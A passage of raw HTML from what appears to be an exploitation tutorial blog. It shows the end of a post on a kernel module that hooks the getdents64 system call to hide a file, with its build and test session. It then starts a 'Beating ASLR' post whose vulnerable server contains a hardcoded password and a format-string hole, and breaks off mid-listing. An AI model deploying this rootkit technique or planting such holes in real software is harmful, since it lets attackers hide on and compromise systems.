class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"getdents_hook_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"void/spanspan class="o"*/spanspan class="p")/spanspan class="mh"0xc1454100/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"original_getdents64/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"getdents_hook_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"getdents_hook_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"getdents_hook_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've set the static constant codeFILE_NAME/code to codethisisatestfile.txt/code. Now to edit the codeMakefile/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span reverse.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span hidefile.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pNow to compile and test:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.14-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/hidefile.o/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘sys_getdents64_hook’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:36:21: warning: assignment from incompatible pointer type [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_init’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:63:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:41:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_exit’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:71:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:49:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:72:9: warning: ‘return’ with a value, in function returning void [enabled by default]/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 3 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/hidefile.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spantouch thisisatestfile.txt/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanrmmod hidefile/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"/code/pre/div /td/tr/table pWoohoo! There is 1 problem with this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls thisisatestfile.txt/span span class="code-line"span class="go"thisisatestfile.txt/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l thisisatestfile.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 0 Jul 11 18:18 thisisatestfile.txt/span/span span class="code-line"/code/pre/div /td/tr/table pSo if you put the whole filename there it still shows that the file exists but we can improve upon that later, we will need to hook different system calls./p h2Conclusion/h2 pThere is a lot involved with manipulating the kernel like this, it requires a lot of patients and determination./p pYou will need to look through a lot of source code and use tools like codegrep/code to find exactly what you need to get the job done./p pAlso codestrace/code is very useful when looking for the system calls being used by an application but its also handy to be able to clean up the output for readability./p pHappy Hacking :-)/p

Beating ASLR

pHere we are going to start with the first protection I want to look at which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR basically randomizes the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of all userland applications and in more modern OSs, kernel space too./p !-- more -- pBefore ASLR, the virtual address space of an application was completely static, meaning that everything will always be at the same memory address each time the application is run./p pIn parts 1, 2 and 3 we've taken advantage of this by being able to predict the address that our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first implemented in 2005 but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the 1 in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define CNUM 58623/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define TFILE quot;tokenquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"5/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendtoken/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan 